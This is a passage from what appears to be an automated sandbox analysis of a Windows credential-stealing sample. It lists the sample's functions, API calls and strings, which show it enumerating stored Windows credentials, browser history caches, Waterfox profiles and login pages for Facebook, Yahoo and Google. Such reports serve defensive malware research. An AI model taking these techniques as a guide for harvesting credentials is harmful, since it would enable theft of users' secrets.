                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • memset.MSVCRT ref: 0040BB53
                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                            • String ID: chp$v10
                                                                            • API String ID: 4290143792-2783969131
                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                            • String ID:
                                                                            • API String ID: 3715365532-3916222277
                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                            • String ID: bhv
                                                                            • API String ID: 4234240956-2689659898
                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2941347001-70141382
                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                            Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 652 4467ac-4467b7 __setusermatherr 645->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->653 647->643 651 44674d-44674f 647->651 648->643 650 446734-44673b 648->650 650->643 654 44673d-446745 650->654 655 446755-446758 651->655 652->653 658 446810-446819 653->658 659 44681e-446825 653->659 654->655 655->645 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                            • String ID:
                                                                            • API String ID: 2827331108-0
                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                            • String ID: visited:
                                                                            • API String ID: 1157525455-1702587658
                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E28B
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                            • API String ID: 2804212203-2982631422
                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040BC75
                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 115830560-3916222277
                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                            • API String ID: 2936932814-4196376884
                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                            Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 855 40bf38-40bf48 LocalFree 853->855 856 40bf2f-40bf35 853->856 854->853 859 40bf08-40bf0e 854->859 855->845 856->855 859->853
                                                                            APIs
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                            • memset.MSVCRT ref: 0040BE91
                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 697348961-0
                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403CBF
                                                                            • memset.MSVCRT ref: 00403CD4
                                                                            • memset.MSVCRT ref: 00403CE9
                                                                            • memset.MSVCRT ref: 00403CFE
                                                                            • memset.MSVCRT ref: 00403D13
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403DDA
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                            • API String ID: 1829478387-11920434
                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
